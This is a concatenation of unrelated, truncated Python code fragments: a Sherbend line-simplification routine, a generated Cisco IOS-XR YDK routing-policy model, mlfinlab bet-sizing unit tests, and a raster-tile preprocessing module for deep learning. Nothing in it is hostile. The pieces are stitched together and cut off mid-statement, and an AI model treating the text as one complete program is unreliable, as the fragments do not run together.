features needed for Polygon reconstruction ext_feature.sb_interiors = int_features # Add the exterior and the interior independently features.append(ext_feature) # Add the exterior features += int_features # Add the interiors else: # Do not add the feature (exterior and interiors ) in the spatial container # Update some stats geo_content.nbr_del_polygons += 1 geo_content.nbr_del_holes += len(feature.interiors) else: raise GeoSimException ("Invalid geometry type: {}".format(feature.geometry)) # Create the spatial container that will receive all the spatial features self.s_container = SpatialContainer() self.s_container.add_features(features) # Load all the features return def _manage_lines_simplification (self, s_constraints): """Main routine to simplify the lines For each line to simplify For each valid bend to simplify check the consraints if the constraint are violated check alternative bends (only if the number of bend to simplify is one. One of the costly operation specially for very long line string (like contour) is to rewrite the coordinates into the Shapely structure. 
This is why we updtade the shapely structure at the end when the last bend of the line is processed Parameters ---------- s_constraints : SpatialContraints Spatal constraints to validate Returns ------- int Total number of bend simplified """ iter_nbr = 0 total_nbr_bend_simplified = 0 # Iterate until all the line are simplified or there are no more line have to be simplified while (True): iter_nbr_bend_simplified = 0 print('Iteration # {}'.format(iter_nbr)) # Build line iterator lines = (feature for feature in self.s_container.get_features() if(not feature.sb_is_simplest and feature.sb_geom_type==GenUtil.LINE_STRING )) for line in lines: nbr_bend_simplified = line.simplify(self.command.diameter, s_constraints) iter_nbr_bend_simplified += nbr_bend_simplified total_nbr_bend_simplified += nbr_bend_simplified print('Number of bend simplified {}'.format(iter_nbr_bend_simplified)) print('----------') iter_nbr += 1 if iter_nbr_bend_simplified == 0: break print('Total number of bend simplified: {}'.format(total_nbr_bend_simplified)) print('Total number of simplicity error: {}'.format(s_constraints.nbr_err_simplicity)) print('Total number of crossing error: {}'.format(s_constraints.nbr_err_crossing)) print('Total number of sidedness error: {}'.format(s_constraints.nbr_err_sidedness)) return total_nbr_bend_simplified def process(self): """Main routine for the Sherbend algorithm The algorithm will simplify the lines using the Sherbend algorithm. It will iterate over the lines until there are no more bends to simplify. Parameters ---------- None Returns ------- geo_content
<filename>cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_policy_repository_oper.py """ Cisco_IOS_XR_policy_repository_oper This module contains a collection of YANG definitions for Cisco IOS\-XR policy\-repository package operational data. This module contains definitions for the following management objects\: routing\-policy\: Routing policy operational data Copyright (c) 2013\-2016 by Cisco Systems, Inc. All rights reserved. """ import re import collections from enum import Enum from ydk.types import Empty, YList, YLeafList, DELETE, Decimal64, FixedBitsDict from ydk.errors import YPYError, YPYModelError class AddressFamilyEnum(Enum): """ AddressFamilyEnum Address Family .. data:: ipv4 = 0 IPv4 Address Family .. data:: ipv6 = 1 IPv6 Address Family .. data:: l2vpn = 2 L2VPN Address Family .. data:: ls = 3 LINKSTATE Address Family .. data:: af_none = 4 No Address Family .. data:: af_unknown = 5 Unknown Address Family """ ipv4 = 0 ipv6 = 1 l2vpn = 2 ls = 3 af_none = 4 af_unknown = 5 @staticmethod def _meta_info(): from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_policy_repository_oper as meta return meta._meta_table['AddressFamilyEnum'] class AttachPointDirectionEnum(Enum): """ AttachPointDirectionEnum Attach Point Direction .. data:: in_ = 0 Attach Point Direction IN .. data:: out = 1 Attach Point Direction OUT """ in_ = 0 out = 1 @staticmethod def _meta_info(): from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_policy_repository_oper as meta return meta._meta_table['AttachPointDirectionEnum'] class GroupEnum(Enum): """ GroupEnum BGP Neighbor Group Type .. data:: address_family_group = 0 Address Family Group .. data:: session_group = 1 Session Group .. data:: neighbor_group = 2 Neighbor Group .. data:: neighbor = 3 Neighbor .. 
data:: error_group = 4 Error Group """ address_family_group = 0 session_group = 1 neighbor_group = 2 neighbor = 3 error_group = 4 @staticmethod def _meta_info(): from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_policy_repository_oper as meta return meta._meta_table['GroupEnum'] class ObjectStatusEnum(Enum): """ ObjectStatusEnum Whether an RPL object is used/referenced .. data:: active = 0 The object is in use .. data:: inactive = 1 The object is referenced by another object, but not used .. data:: unused = 2 The object is not used or referenced """ active = 0 inactive = 1 unused = 2 @staticmethod def _meta_info(): from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_policy_repository_oper as meta return meta._meta_table['ObjectStatusEnum'] class SubAddressFamilyEnum(Enum): """ SubAddressFamilyEnum Sub Address Family .. data:: unicast = 0 Unicast .. data:: multicast = 1 Multicast .. data:: label = 2 Label .. data:: tunnel = 3 Tunnel .. data:: vpn = 4 VPN .. data:: mdt = 5 MDT .. data:: vpls = 6 VPLS .. data:: rt_constraint = 7 RTConstraint .. data:: mvpn = 8 MVPN .. data:: flow = 9 FLOW .. data:: vpn_mcast = 10 VPN Multicast .. data:: saf_none = 11 No SAFI .. data:: saf_unknown = 12 Unknown """ unicast = 0 multicast = 1 label = 2 tunnel = 3 vpn = 4 mdt = 5 vpls = 6 rt_constraint = 7 mvpn = 8 flow = 9 vpn_mcast = 10 saf_none = 11 saf_unknown = 12 @staticmethod def _meta_info(): from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_policy_repository_oper as meta return meta._meta_table['SubAddressFamilyEnum'] class RoutingPolicy(object): """ Routing policy operational data .. attribute:: limits Information about configured limits and the current values **type**\: :py:class:`Limits <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.RoutingPolicy.Limits>` .. attribute:: policies Information about configured route policies **type**\: :py:class:`Policies <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.RoutingPolicy.Policies>` .. 
attribute:: sets Information about configured sets **type**\: :py:class:`Sets <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.RoutingPolicy.Sets>` """ _prefix = 'policy-repository-oper' _revision = '2015-11-09' def __init__(self): self.limits = RoutingPolicy.Limits() self.limits.parent = self self.policies = RoutingPolicy.Policies() self.policies.parent = self self.sets = RoutingPolicy.Sets() self.sets.parent = self class Limits(object): """ Information about configured limits and the current values .. attribute:: compiled_policies_length The total compiled length of all policies **type**\: int **range:** 0..4294967295 .. attribute:: current_lines_of_policy_limit Number of lines of configuration for policies/sets currently allowed **type**\: int **range:** 0..4294967295 .. attribute:: current_lines_of_policy_used Current number of lines configured for all policies and sets **type**\: int **range:** 0..4294967295 .. attribute:: current_number_of_policies_limit Number of policies currently allowed **type**\: int **range:** 0..4294967295 .. attribute:: current_number_of_policies_used Current number of policies configured **type**\: int **range:** 0..4294967295 .. attribute:: maximum_lines_of_policy Maximum lines of configuration allowable for all policies and sets **type**\: int **range:** 0..4294967295 .. 
attribute:: maximum_number_of_policies Maximum number of policies allowable **type**\: int **range:** 0..4294967295 """ _prefix = 'policy-repository-oper' _revision = '2015-11-09' def __init__(self): self.parent = None self.compiled_policies_length = None self.current_lines_of_policy_limit = None self.current_lines_of_policy_used = None self.current_number_of_policies_limit = None self.current_number_of_policies_used = None self.maximum_lines_of_policy = None self.maximum_number_of_policies = None @property def _common_path(self): return '/Cisco-IOS-XR-policy-repository-oper:routing-policy/Cisco-IOS-XR-policy-repository-oper:limits' def is_config(self): ''' Returns True if this instance represents config data else returns False ''' return False def _has_data(self): if not self.is_config(): return False if self.compiled_policies_length is not None: return True if self.current_lines_of_policy_limit is not None: return True if self.current_lines_of_policy_used is not None: return True if self.current_number_of_policies_limit is not None: return True if self.current_number_of_policies_used is not None: return True if self.maximum_lines_of_policy is not None: return True if self.maximum_number_of_policies is not None: return True return False @staticmethod def _meta_info(): from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_policy_repository_oper as meta return meta._meta_table['RoutingPolicy.Limits']['meta_info'] class Policies(object): """ Information about configured route policies .. attribute:: active All objects of a given type that are attached to a protocol **type**\: :py:class:`Active <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.RoutingPolicy.Policies.Active>` .. attribute:: inactive All objects of a given type that are not attached to a protocol **type**\: :py:class:`Inactive <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.RoutingPolicy.Policies.Inactive>` .. 
attribute:: route_policies Information about individual policies **type**\: :py:class:`RoutePolicies <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.RoutingPolicy.Policies.RoutePolicies>` .. attribute:: unused All objects of a given type that are not referenced at all **type**\: :py:class:`Unused <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.RoutingPolicy.Policies.Unused>` """ _prefix = 'policy-repository-oper' _revision = '2015-11-09' def __init__(self): self.parent = None self.active = RoutingPolicy.Policies.Active() self.active.parent = self self.inactive = RoutingPolicy.Policies.Inactive() self.inactive.parent = self self.route_policies = RoutingPolicy.Policies.RoutePolicies() self.route_policies.parent = self self.unused = RoutingPolicy.Policies.Unused() self.unused.parent = self class RoutePolicies(object): """ Information about individual policies .. attribute:: route_policy Information about an individual policy **type**\: list of :py:class:`RoutePolicy <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.RoutingPolicy.Policies.RoutePolicies.RoutePolicy>` """ _prefix = 'policy-repository-oper' _revision = '2015-11-09' def __init__(self): self.parent = None self.route_policy = YList() self.route_policy.parent = self self.route_policy.name = 'route_policy' class RoutePolicy(object): """ Information about an individual policy .. attribute:: route_policy_name <key> Route policy name **type**\: str **pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+ .. attribute:: attached Information about where this policy or set is attached **type**\: :py:class:`Attached <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.RoutingPolicy.Policies.RoutePolicies.RoutePolicy.Attached>` .. attribute:: policy_uses Information about which policies and sets this policy uses **type**\: :py:class:`PolicyUses <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.RoutingPolicy.Policies.RoutePolicies.RoutePolicy.PolicyUses>` .. 
attribute:: used_by Policies that use this object, directly or indirectly **type**\: :py:class:`UsedBy <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.RoutingPolicy.Policies.RoutePolicies.RoutePolicy.UsedBy>` """ _prefix = 'policy-repository-oper' _revision = '2015-11-09' def __init__(self): self.parent = None self.route_policy_name = None self.attached = RoutingPolicy.Policies.RoutePolicies.RoutePolicy.Attached() self.attached.parent = self self.policy_uses = RoutingPolicy.Policies.RoutePolicies.RoutePolicy.PolicyUses() self.policy_uses.parent = self self.used_by = RoutingPolicy.Policies.RoutePolicies.RoutePolicy.UsedBy() self.used_by.parent = self class PolicyUses(object): """ Information about which policies and sets this policy uses .. attribute:: all_used_policies Policies used by this policy, or by policies that it uses **type**\: :py:class:`AllUsedPolicies <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.RoutingPolicy.Policies.RoutePolicies.RoutePolicy.PolicyUses.AllUsedPolicies>` .. attribute:: all_used_sets Sets used by this policy, or by policies that it uses **type**\: :py:class:`AllUsedSets <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.RoutingPolicy.Policies.RoutePolicies.RoutePolicy.PolicyUses.AllUsedSets>` .. attribute:: directly_used_policies Policies that this policy uses directly **type**\: :py:class:`DirectlyUsedPolicies <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.RoutingPolicy.Policies.RoutePolicies.RoutePolicy.PolicyUses.DirectlyUsedPolicies>` .. 
attribute:: directly_used_sets Sets that this policy uses directly **type**\: :py:class:`DirectlyUsedSets <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.RoutingPolicy.Policies.RoutePolicies.RoutePolicy.PolicyUses.DirectlyUsedSets>` """ _prefix = 'policy-repository-oper' _revision = '2015-11-09' def __init__(self): self.parent = None self.all_used_policies = RoutingPolicy.Policies.RoutePolicies.RoutePolicy.PolicyUses.AllUsedPolicies() self.all_used_policies.parent = self self.all_used_sets = RoutingPolicy.Policies.RoutePolicies.RoutePolicy.PolicyUses.AllUsedSets() self.all_used_sets.parent = self self.directly_used_policies = RoutingPolicy.Policies.RoutePolicies.RoutePolicy.PolicyUses.DirectlyUsedPolicies() self.directly_used_policies.parent = self self.directly_used_sets = RoutingPolicy.Policies.RoutePolicies.RoutePolicy.PolicyUses.DirectlyUsedSets() self.directly_used_sets.parent = self class DirectlyUsedPolicies(object): """ Policies that this policy uses directly .. attribute:: object Policy objects **type**\: list of str """ _prefix = 'policy-repository-oper' _revision = '2015-11-09' def __init__(self): self.parent = None self.object = YLeafList() self.object.parent = self self.object.name = 'object' @property def _common_path(self): if self.parent is None: raise YPYModelError('parent is not set . Cannot derive path.') return self.parent._common_path +'/Cisco-IOS-XR-policy-repository-oper:directly-used-policies' def is_config(self): ''' Returns True if this instance represents config data else returns False ''' return False def _has_data(self): if not self.is_config(): return False if self.object is not None: for child in self.object: if child is not None: return True return False @staticmethod def _meta_info(): from
""" Tests the higher level functions in bet_sizing.py. """ import unittest from unittest.mock import patch import datetime as dt import numpy as np import pandas as pd from scipy.stats import norm, moment from mlfinlab.bet_sizing.bet_sizing import (bet_size_probability, bet_size_dynamic, bet_size_budget, bet_size_reserve, confirm_and_cast_to_df, get_concurrent_sides, cdf_mixture, single_bet_size_mixed) from mlfinlab.bet_sizing.ch10_snippets import (get_signal, avg_active_signals, discrete_signal, get_w, get_target_pos, limit_price, bet_size) from mlfinlab.bet_sizing.ef3m import M2N, raw_moment, most_likely_parameters class TestBetSizeProbability(unittest.TestCase): """ Tests the 'bet_size_probability' function. """ def test_bet_size_probability_default(self): """ Tests for successful execution using the default arguments of 'bet_size_probability', which are: average_active = False step_size = 0.0 """ # Setup the test DataFrame. dates_test = np.array([dt.datetime(2000, 1, 1) + i * dt.timedelta(days=1) for i in range(5)]) shift_dt = np.array([dt.timedelta(days=0.5*i+1) for i in range(5)]) dates_shifted_test = dates_test + shift_dt events_test = pd.DataFrame(data=[[0.55, 1], [0.7, -1], [0.95, 1], [0.65, -1], [0.85, 1]], columns=['prob', 'side'], index=dates_test) events_test['t1'] = dates_shifted_test # Calculate correct output. signal_0 = get_signal(events_test['prob'], 2, events_test['side']) df_signal_0 = signal_0.to_frame('signal').join(events_test['t1'], how='left') signal_1 = df_signal_0.signal # Evaluate test. self.assertTrue(signal_1.equals(bet_size_probability(events_test, events_test['prob'], 2, events_test['side']))) def test_bet_size_probability_avg_active(self): """ Tests for successful execution of 'bet_size_probability' with 'average_active' set to True. """ # Setup the test DataFrame. 
dates_test = np.array([dt.datetime(2000, 1, 1) + i * dt.timedelta(days=1) for i in range(5)]) shift_dt = np.array([dt.timedelta(days=0.5*i+1) for i in range(5)]) dates_shifted_test = dates_test + shift_dt events_test = pd.DataFrame(data=[[0.55, 1], [0.7, -1], [0.95, 1], [0.65, -1], [0.85, 1]], columns=['prob', 'side'], index=dates_test) events_test['t1'] = dates_shifted_test # Calculate correct output. signal_0 = get_signal(events_test['prob'], 2, events_test['side']) df_signal_0 = signal_0.to_frame('signal').join(events_test['t1'], how='left') signal_1 = avg_active_signals(df_signal_0, 1) # Evaluate test. self.assertTrue(signal_1.equals(bet_size_probability(events=events_test, prob=events_test['prob'], num_classes=2, pred=events_test['side'], average_active=True))) def test_bet_size_probability_stepsize(self): """ Tests for successful execution of 'bet_size_probability' with 'step_size' greater than 0. """ # Setup the test DataFrame. dates_test = np.array([dt.datetime(2000, 1, 1) + i * dt.timedelta(days=1) for i in range(5)]) shift_dt = np.array([dt.timedelta(days=0.5*i+1) for i in range(5)]) dates_shifted_test = dates_test + shift_dt events_test = pd.DataFrame(data=[[0.55, 1], [0.7, -1], [0.95, 1], [0.65, -1], [0.85, 1]], columns=['prob', 'side'], index=dates_test) events_test['t1'] = dates_shifted_test # Calculate correct output. signal_0 = get_signal(events_test['prob'], 2, events_test['side']) df_signal_0 = signal_0.to_frame('signal').join(events_test['t1'], how='left') signal_1 = df_signal_0.signal signal_1 = discrete_signal(signal0=signal_1, step_size=0.1) # Evaluate test. self.assertTrue(signal_1.equals(bet_size_probability(events=events_test, prob=events_test['prob'], num_classes=2, pred=events_test['side'], step_size=0.1))) class TestBetSizeDynamic(unittest.TestCase): """ Tests the 'bet_size_dynamic' function. 
""" def test_bet_size_dynamic_default(self): """ Tests for successful execution using the default arguments of 'bet_size_dynamic', which are: average_active = False step_size = 0.0 """ # Setup the test DataFrame. dates_test = np.array([dt.datetime(2000, 1, 1) + i * dt.timedelta(days=1) for i in range(5)]) events_test = pd.DataFrame(data=[[25, 55, 75.50, 80.00], [35, 55, 76.90, 75.00], [45, 55, 74.10, 72.50], [40, 55, 67.75, 65.00], [30, 55, 62.00, 70.80]], columns=['pos', 'max_pos', 'm_p', 'f'], index=dates_test) # Calculate results. d_events = {col: events_test[col] for col in list(events_test.columns)} events_results = confirm_and_cast_to_df(d_events) w_param = get_w(10, 0.95, 'sigmoid') events_results['t_pos'] = events_results.apply(lambda row: get_target_pos(w_param, row.f, row.m_p, row.max_pos, 'sigmoid'), axis=1) events_results['l_p'] = events_results.apply(lambda row: limit_price(row.t_pos, row.pos, row.f, w_param, row.max_pos, 'sigmoid'), axis=1) events_results['bet_size'] = events_results.apply(lambda row: bet_size(w_param, row.f-row.m_p, 'sigmoid'), axis=1) df_result = events_results[['bet_size', 't_pos', 'l_p']] # Evaluate. self.assertTrue(df_result.equals(bet_size_dynamic(events_test['pos'], events_test['max_pos'], events_test['m_p'], events_test['f']))) class TestBetSizeBudget(unittest.TestCase): """ Tests the 'bet_size_budget' function. """ def test_bet_size_budget_default(self): """ Tests for the successful execution of the 'bet_size_budget' function. """ # Setup the test DataFrame. dates_test = np.array([dt.datetime(2000, 1, 1) + i * dt.timedelta(days=1) for i in range(5)]) shift_dt = np.array([dt.timedelta(days=0.5*i+1) for i in range(5)]) dates_shifted_test = dates_test + shift_dt events_test = pd.DataFrame(data=[[0.55, 1], [0.7, 1], [0.95, 1], [0.65, -1], [0.85, 1]], columns=['prob', 'side'], index=dates_test) events_test['t1'] = dates_shifted_test # Calculate correct result. 
events_result = get_concurrent_sides(events_test['t1'], events_test['side']) avg_long = events_result['active_long'] / events_result['active_long'].max() avg_short = events_result['active_short'] / events_result['active_short'].max() events_result['bet_size'] = avg_long - avg_short # Evaluate. self.assertTrue(events_result.equals(bet_size_budget(events_test['t1'], events_test['side']))) class TestBetSizeReserve(unittest.TestCase): """ Tests the 'bet_size_reserve' function. """ @patch('mlfinlab.bet_sizing.bet_sizing.most_likely_parameters') def test_bet_size_reserve_default(self, mock_likely_parameters): """ Tests for successful execution of 'bet_size_reserve' using default arguments, return_parameters=False. Function 'most_likely_parameters' needs to be patched because the 'M2N.mp_fit' method makes use of random numbers. """ # Setup the test DataFrame. np.random.seed(0) sample_size = 500 start_date = dt.datetime(2000, 1, 1) date_step = dt.timedelta(days=1) dates = np.array([start_date + i*date_step for i in range(sample_size)]) shift_dt = np.array([dt.timedelta(days=d) for d in np.random.uniform(1., 20., sample_size)]) dates_shifted = dates + shift_dt time_1 = pd.Series(data=dates_shifted, index=dates) df_events = time_1.to_frame() df_events = df_events.rename(columns={0: 't1'}) df_events['p'] = np.random.uniform(0.0, 1.0, sample_size) df_events = df_events[['t1', 'p']] df_events['side'] = df_events['p'].apply(lambda x: 1 if x >= 0.5 else -1) # Calculate the correct results. 
        # NOTE(review): this chunk begins mid-method — the enclosing 'def' (a
        # @patch-decorated test of bet_size_reserve's default path) starts above
        # this view. The code below builds the expected result by hand and
        # compares it to the function under test.
        events_active = get_concurrent_sides(df_events['t1'], df_events['side'])
        # Net concurrent side count: longs active minus shorts active.
        events_active['c_t'] = events_active['active_long'] - events_active['active_short']
        # First five central moments of c_t feed the mixture-of-two-Gaussians fit.
        central_moments = [moment(events_active['c_t'].to_numpy(), moment=i) for i in range(1, 6)]
        raw_moments = raw_moment(central_moments=central_moments, dist_mean=events_active['c_t'].mean())
        m2n_test = M2N(raw_moments, epsilon=1e-5, factor=5, n_runs=25, variant=2, max_iter=10_000, num_workers=1)
        test_results = m2n_test.mp_fit()
        test_params = most_likely_parameters(test_results)
        # Patch the randomized fit so the function under test sees the exact
        # same parameters as the expected-value computation above.
        mock_likely_parameters.return_value = test_params
        test_fit = [test_params[key] for key in ['mu_1', 'mu_2', 'sigma_1', 'sigma_2', 'p_1']]
        events_active['bet_size'] = events_active['c_t'].apply(lambda c: single_bet_size_mixed(c, test_fit))
        # Evaluate.
        df_bet = bet_size_reserve(df_events['t1'], df_events['side'], fit_runs=25)
        self.assertTrue(events_active.equals(df_bet))

    @patch('mlfinlab.bet_sizing.bet_sizing.most_likely_parameters')
    def test_bet_size_reserve_return_params(self, mock_likely_parameters):
        """
        Tests for successful execution of 'bet_size_reserve' using return_parameters=True.

        Function 'most_likely_parameters' needs to be patched because the
        'M2N.mp_fit' method makes use of random numbers.
        """
        # Setup the test DataFrame.
        np.random.seed(0)  # fixed seed so the expected values are reproducible
        sample_size = 500
        start_date = dt.datetime(2000, 1, 1)
        date_step = dt.timedelta(days=1)
        dates = np.array([start_date + i*date_step for i in range(sample_size)])
        # Random event end-times 1..20 days after each start date.
        shift_dt = np.array([dt.timedelta(days=d) for d in np.random.uniform(1., 20., sample_size)])
        dates_shifted = dates + shift_dt
        time_1 = pd.Series(data=dates_shifted, index=dates)
        df_events = time_1.to_frame()
        df_events = df_events.rename(columns={0: 't1'})
        df_events['p'] = np.random.uniform(0.0, 1.0, sample_size)
        df_events = df_events[['t1', 'p']]
        # Side is +1 (long) for p >= 0.5, otherwise -1 (short).
        df_events['side'] = df_events['p'].apply(lambda x: 1 if x >= 0.5 else -1)
        # Calculate the correct results.
        events_active = get_concurrent_sides(df_events['t1'], df_events['side'])
        events_active['c_t'] = events_active['active_long'] - events_active['active_short']
        central_moments = [moment(events_active['c_t'].to_numpy(), moment=i) for i in range(1, 6)]
        raw_moments = raw_moment(central_moments=central_moments, dist_mean=events_active['c_t'].mean())
        m2n_test = M2N(raw_moments, epsilon=1e-5, factor=5, n_runs=25, variant=2, max_iter=10_000, num_workers=1)
        test_results = m2n_test.mp_fit()
        test_params = most_likely_parameters(test_results)
        mock_likely_parameters.return_value = test_params
        test_fit = [test_params[key] for key in ['mu_1', 'mu_2', 'sigma_1', 'sigma_2', 'p_1']]
        events_active['bet_size'] = events_active['c_t'].apply(lambda c: single_bet_size_mixed(c, test_fit))
        # Evaluate: with return_parameters=True both the sized events and the
        # fitted mixture parameters are returned.
        eval_events, eval_params = bet_size_reserve(df_events['t1'], df_events['side'], fit_runs=25, return_parameters=True)
        self.assertEqual(test_params, eval_params)
        self.assertTrue(events_active.equals(eval_events))


class TestConfirmAndCastToDf(unittest.TestCase):
    """
    Tests the 'confirm_and_cast_to_df' function.
    """
    def test_cast_to_df_all_series(self):
        """
        Tests for successful execution of 'confirm_and_cast_to_df' when all
        dictionary values are pandas.Series.
        """
        # Setup the test DataFrame.
        dates_test = np.array([dt.datetime(2000, 1, 1) + i * dt.timedelta(days=1) for i in range(5)])
        events_test = pd.DataFrame(data=[[25, 55, 75.50, 80.00],
                                         [35, 55, 76.90, 75.00],
                                         [45, 55, 74.10, 72.50],
                                         [40, 55, 67.75, 65.00],
                                         [30, 55, 62.00, 70.80]],
                                   columns=['pos', 'max_pos', 'm_p', 'f'],
                                   index=dates_test)
        d_events = {col: events_test[col] for col in list(events_test.columns)}
        # Evaluate.
        df_results = confirm_and_cast_to_df(d_events)
        self.assertTrue(events_test.equals(df_results))

    def test_cast_to_df_one_series(self):
        """
        Tests for successful execution of 'confirm_and_cast_to_df' when only one
        of the dictionary values is a pandas.Series (the rest are scalars that
        must be broadcast down the full column).
        """
        # Setup the test DataFrame.
        dates_test = np.array([dt.datetime(2000, 1, 1) + i * dt.timedelta(days=1) for i in range(5)])
        max_pos, market_price, forecast_price = 55, 75.00, 80.00
        events_test = pd.DataFrame(data=[[25, max_pos, market_price, forecast_price],
                                         [35, max_pos, market_price, forecast_price],
                                         [45, max_pos, market_price, forecast_price],
                                         [40, max_pos, market_price, forecast_price],
                                         [30, max_pos, market_price, forecast_price]],
                                   columns=['pos', 'max_pos', 'm_p', 'f'],
                                   index=dates_test)
        d_events = {'pos': events_test['pos'], 'max_pos': max_pos, 'm_p': market_price, 'f': forecast_price}
        # Evaluate. (Third positional argument of np.allclose is 'rtol'.)
        df_results = confirm_and_cast_to_df(d_events)
        self.assertTrue(np.allclose(events_test.to_numpy(), df_results.to_numpy(), 1e-9))

    def test_cast_to_df_no_series(self):
        """
        Tests for successful execution of 'confirm_and_cast_to_df' when none of
        the dictionary values are a pandas.Series.
        """
        # Setup the test DataFrame.
        pos, max_pos, market_price, forecast_price = 35, 55, 75.00, 80.00
        events_test = pd.DataFrame(data=[[pos, max_pos, market_price, forecast_price]],
                                   columns=['pos', 'max_pos', 'm_p', 'f'])
        d_events = {'pos': pos, 'max_pos': max_pos, 'm_p': market_price, 'f': forecast_price}
        # Evaluate.
        df_results = confirm_and_cast_to_df(d_events)
        self.assertTrue(np.allclose(events_test.to_numpy(), df_results.to_numpy(), 1e-9))


class TestGetConcurrentSides(unittest.TestCase):
    """
    Tests the function 'get_concurrent_sides' for successful operation.
    """
    def test_get_concurrent_sides_default(self):
        """
        Tests for the successful execution of 'get_concurrent_sides'. Since
        there are no options or branches, there are no additional test cases
        beyond default.
        """
        # Setup the test DataFrame.
        np.random.seed(0)
        sample_size = 100
        start_date = dt.datetime(2000, 1, 1)
        date_step = dt.timedelta(days=1)
        dates = np.array([start_date + i*date_step for i in range(sample_size)])
        shift_dt = np.array([dt.timedelta(days=d) for d in np.random.uniform(1., 20., sample_size)])
        dates_shifted = dates + shift_dt
        time_1 = pd.Series(data=dates_shifted, index=dates)
        df_events = time_1.to_frame()
        df_events = df_events.rename(columns={0: 't1'})
        df_events['p'] = np.random.uniform(0.0, 1.0, sample_size)
        df_events = df_events[['t1', 'p']]
        df_events['side'] = df_events['p'].apply(lambda x: 1 if x >= 0.5 else -1)
        # Calculate correct result: for each event start 'idx', collect the
        # long-side events that are simultaneously active (started on or
        # before idx and not yet ended).
        events_test = df_events.copy()
        events_test['active_long'] = 0
        events_test['active_short'] = 0
        for idx in events_test.index:
            df_long_active_idx = set(events_test[(events_test.index <= idx) & (events_test['t1'] > idx) \
                & (events_test['side'] > 0)].index)
            events_test.loc[idx,
# --------------------------------------------------------------------------
# Core functions to train on NGA data.
# --------------------------------------------------------------------------
import gc  # clean garbage collection
import glob  # get global files from directory
import random  # for random integers
from tqdm import tqdm  # for progress bar
import numpy as np  # for arrays modifications
import cupy as cp  # for arrays modifications
import tensorflow as tf  # deep learning framework
import scipy.signal  # for postprocessing
import math  # for math calculations
import rasterio as rio  # read rasters

# Has a bug and will be included when bug is fixed.
# from cuml.dask.preprocessing import OneHotEncoder, LabelBinarizer
# For generating one-hot encoder labels
from datetime import datetime
from tensorflow.keras.utils import to_categorical
from tensorflow.keras.callbacks import ModelCheckpoint, EarlyStopping
from tensorflow.keras.callbacks import TensorBoard, CSVLogger


# --------------------------------------------------------------------------
# Preprocessing Functions
# --------------------------------------------------------------------------

def image_normalize(img, axis=(0, 1), c=1e-8):
    """
    Normalize to zero mean and unit standard deviation along the given axis.

    Args:
        img (numpy or cupy): array (w, h, c)
        axis (integer tuple): int or tuple of width and height axis
        c (float): epsilon to bound given std value (avoids divide-by-zero
            on constant bands)
    Return:
        Normalized single image.
    ----------
    Example
    ----------
        image_normalize(arr, axis=(0, 1), c=1e-8)
    """
    return (img - img.mean(axis)) / (img.std(axis) + c)


def batch_normalize(batch, axis=(0, 1), c=1e-8):
    """
    Normalize batch to zero mean and unit standard deviation.

    Args:
        batch (numpy or cupy): array (n, w, h, c)
        axis (integer tuple): int or tuple of width and height axis
        c (float): epsilon to bound given std value
    Return:
        Normalized batch of images (modified in place and returned).
    ----------
    Example
    ----------
        batch_normalize(arr, axis=(0, 1), c=1e-8)
    """
    # Note: for loop was proven to be faster than map method
    for b in range(batch.shape[0]):
        batch[b, :, :, :] = image_normalize(batch[b, :, :, :], axis=axis, c=c)
    return batch


def gen_data_npz(fimg, img, mask, config, ntiles=1000, save_dir='train'):
    """
    Extract random patches from cupy arrays and save them as one .npz file.

    Args:
        fimg (str): data filename (its extension, last 4 chars, is stripped
            to build the output name)
        img (cupy.array): cupy array with data, shape (c, x, y)
        mask (cupy.array): cupy array with mask, shape (x, y)
        config: configuration object providing TILE_SIZE, N_CLASSES,
            NODATA_VAL, NORMALIZE, STANDARDIZE, normalization_factor
        ntiles (int): number of random tiles to extract
        save_dir (str): directory to save output
    Return:
        None; saves dataset to save_dir.
    ----------
    Example
    ----------
        gen_data_npz('image.tif', arr, mask, config, 8000, 'output')
    """
    # set dimensions of the input image array, and get desired tile size
    z_dim, x_dim, y_dim = img.shape
    tsz = config.TILE_SIZE

    # placeholders for final datasets
    img_cp = cp.empty((ntiles, tsz, tsz, z_dim), dtype=cp.float32)
    mask_np = np.empty((ntiles, tsz, tsz, config.N_CLASSES), dtype=np.float16)

    # generate n number of tiles
    for i in tqdm(range(ntiles)):

        # Generate random integers from image
        xc = random.randint(0, x_dim - tsz)
        yc = random.randint(0, y_dim - tsz)

        # verify data is not on nodata region
        # NOTE(review): if most of the scene is nodata this rejection loop
        # can resample for a long time — confirm inputs are mostly valid.
        while cp.any(
            img[:, xc:(xc + tsz), yc:(yc + tsz)] == config.NODATA_VAL
        ):
            xc = random.randint(0, x_dim - tsz)
            yc = random.randint(0, y_dim - tsz)

        # change order to (h, w, c)
        tile_img = cp.moveaxis(
            img[:, xc:(xc + tsz), yc:(yc + tsz)], 0, -1
        )

        # TODO: replace with cuml One-hot encoder on future date when they fix
        # a bug on the output types. Using to_categorical in the meantime
        # Converts labels into one-hot encoding labels
        tile_mask = to_categorical(
            cp.asnumpy(mask[xc:(xc + tsz), yc:(yc + tsz)]),
            num_classes=config.N_CLASSES, dtype='float16'
        )

        # maybe standardize here? depends on performance of single img vs batch
